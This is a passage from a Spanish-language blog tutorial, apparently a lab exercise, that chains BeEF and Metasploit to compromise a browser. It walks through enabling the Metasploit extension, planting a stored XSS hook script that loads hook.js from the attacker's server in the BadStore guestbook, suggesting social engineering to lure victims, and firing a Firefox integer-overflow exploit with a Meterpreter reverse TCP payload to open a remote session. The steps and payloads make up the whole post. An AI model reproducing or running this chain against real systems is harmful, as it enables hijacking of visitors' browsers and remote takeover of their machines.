En la línea
metasploit:
enable: true
Grabamos y luego nos dirigimos al directorio /pentest/web/beef/extensions/metasploit y editamos el archivo config.yaml
Modificamos las línea como se muestran a continuación, dando la IP de nuestra máquina que aloja BeEF, en este caso BT5R3, grabamos y salimos.
PASO 2
Una vez hecho las configuraciones en BeEF ejecutamos nuestro Metasploit de la siguiente manera:
Esperamos hasta que cargue por completo Metasploit y en la línea de comandos ejecutar lo siguiente:
msf> load msgrpc SeverHost=192.168.0.20 Pass=beef
Recuerden que la IP fue la que colocamos en el archive config.yaml y también seteamos nuestro password, en este caso “beef”
Listo ya tenemos los plugin a la espera de se utilizados en BeEF
PASO 3:
Ejecutamos BeEF de la siguiente manera:
En nuestro navegador ingresamos a la siguiente dirección URL para acceder al panel de control.
Como observamos nos hay ninguna máquina zombi.
PASO 4:
Hasta aquí tenemos casi el 40% de nuestro ataque, pero para concretarlo necesitamos una carnada, en este caso BADSTORE será el sitio ya que posee vulnerabilidades XSS en su codificación.
Bien vamos a ir al libro de visitas para firmar y a la vez cargar nuestro script “hook,js” (la carnada)
Manos a la obra <script src=http://ip_bactrack_beef:3000/hook.js></script>
PASO 5:
Pues aquí nos tocaría esperar que nuestra víctima firme el libro de visitas para que se convierta en zombi de nuestro BeEF
No tenemos tan mala suerte y una víctima procedió a firmar el libro de visitas, aquí se recomendaría publicitarlo por algún método de ingeniería social.
PASO 6:
De vuelta a nuestro panel de control de BeEF nos damos cuenta que ya tenemos objetivos zombis, nuestra víctima con IP 192.168.0.100
En la pestaña Detalles podemos revisar las características del sistema zombi, y con ello podremos enfocarnos en las vulnerabilidades que presenta el sistema objetivo.
PASO 7:
Ahora que tenemos más claro las características de nuestra víctima nos dirigimos a la pestaña decomandos / Metasploit
Escogemos Mozilla Firefox Array.reduceRight() Integer Overflow y llenamos lo siguiente:
SRVHOST: 192.168.0.20 (ip de nuestra máquina BT)
SRVPORT: 8080
PAYLOAD: windows/meterpreter/reverse_tcp
LPORT: 4444 (si estuviera ocupado escoger otro)
EXITFUNC: process
PASO 8:
Nos dirigimos a la consola de Metasploit y nos damos cuenta que tenemos session.
Probamos con los comandos:
meterpreter>getuid
meterpreter>sysinfo
Fuente: Th3h@Ck¡_@dM¡n
Que buen Post me encanta, gracias. Sobre todo muy bien explicado ;)
ResponderEliminar